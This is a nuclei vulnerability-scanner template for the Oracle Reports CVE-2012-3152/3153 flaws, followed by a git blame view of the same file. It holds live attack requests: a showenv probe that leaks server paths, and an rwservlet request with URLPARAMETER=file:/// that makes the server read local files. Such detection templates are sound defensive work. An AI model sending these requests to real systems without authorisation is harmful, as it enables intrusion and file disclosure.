nuclei-templates/cves/2012/CVE-2012-3153.yaml

id: CVE-2012-3153

info:
  name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
  author: Sid Ahmed MALAOUI @ Realistic Security
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
    11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
    vectors related to Report Server Component.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
    - https://www.exploit-db.com/exploits/31737
  tags: cve,cve2012,oracle,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/reports/rwservlet/showenv"
      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"

    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "Reports Servlet")'

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - '!contains(body_2, "<html")'
          - '!contains(body_2, "<HTML")'
        condition: and

    extractors:
      - type: regex
        name: windows_working_path
        regex:
          - ".?.?\\\\.*\\\\showenv"
      - type: regex
        name: linux_working_path
        regex:
          - "/.*/showenv"
Updated Oracle Forms & Reports CVE-2012-3153 2021-06-22 13:52:51 +00:00			`id: CVE-2012-3153`
Create CVE-2012-3152, CVE-2012-3153 2021-06-21 08:48:42 +00:00
			`info:`
Updated Oracle Forms & Reports CVE-2012-3153 2021-06-22 13:52:51 +00:00			`name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)`
Create CVE-2012-3152, CVE-2012-3153 2021-06-21 08:48:42 +00:00			`author: Sid Ahmed MALAOUI @ Realistic Security`
			`severity: critical`
			`description: \|`
Updated Oracle Forms & Reports CVE-2012-3153 2021-06-22 13:52:51 +00:00			`Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,`
			`11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown`
Create CVE-2012-3152, CVE-2012-3153 2021-06-21 08:48:42 +00:00			`vectors related to Report Server Component.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2012-3152`
			`- https://www.exploit-db.com/exploits/31737`
			`tags: cve,cve2012,oracle,rce`

			`requests:`
			`- method: GET`
			`path:`
Updated Oracle Forms & Reports CVE-2012-3153 2021-06-22 13:52:51 +00:00			`- "{{BaseURL}}/reports/rwservlet/showenv"`
Create CVE-2012-3152, CVE-2012-3153 2021-06-21 08:48:42 +00:00			`- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"`
misc changes 2021-06-23 18:18:34 +00:00
Updated Oracle Forms & Reports CVE-2012-3153 2021-06-22 13:52:51 +00:00			`req-condition: true`
			`matchers-condition: and`
Create CVE-2012-3152, CVE-2012-3153 2021-06-21 08:48:42 +00:00			`matchers:`
Updated Oracle Forms & Reports CVE-2012-3153 2021-06-22 13:52:51 +00:00			`- type: dsl`
			`dsl:`
strict matchers 2021-07-03 19:35:05 +00:00			`- 'contains(body_1, "Reports Servlet")'`
misc changes 2021-06-23 18:18:34 +00:00
making status check generic both case 2021-06-23 18:43:58 +00:00			`- type: status`
			`status:`
			`- 200`
misc changes 2021-06-23 18:18:34 +00:00
			`- type: dsl`
			`dsl:`
More edge cases 2021-06-29 07:11:19 +00:00			`- '!contains(body_2, "<html")'`
			`- '!contains(body_2, "<HTML")'`
misc changes 2021-06-23 18:18:34 +00:00			`condition: and`

Updated Oracle Forms & Reports CVE-2012-3153 2021-06-22 13:52:51 +00:00			`extractors:`
			`- type: regex`
			`name: windows_working_path`
			`regex:`
			`- ".?.?\\\\.*\\\\showenv"`
			`- type: regex`
			`name: linux_working_path`
			`regex:`
			`- "/.*/showenv"`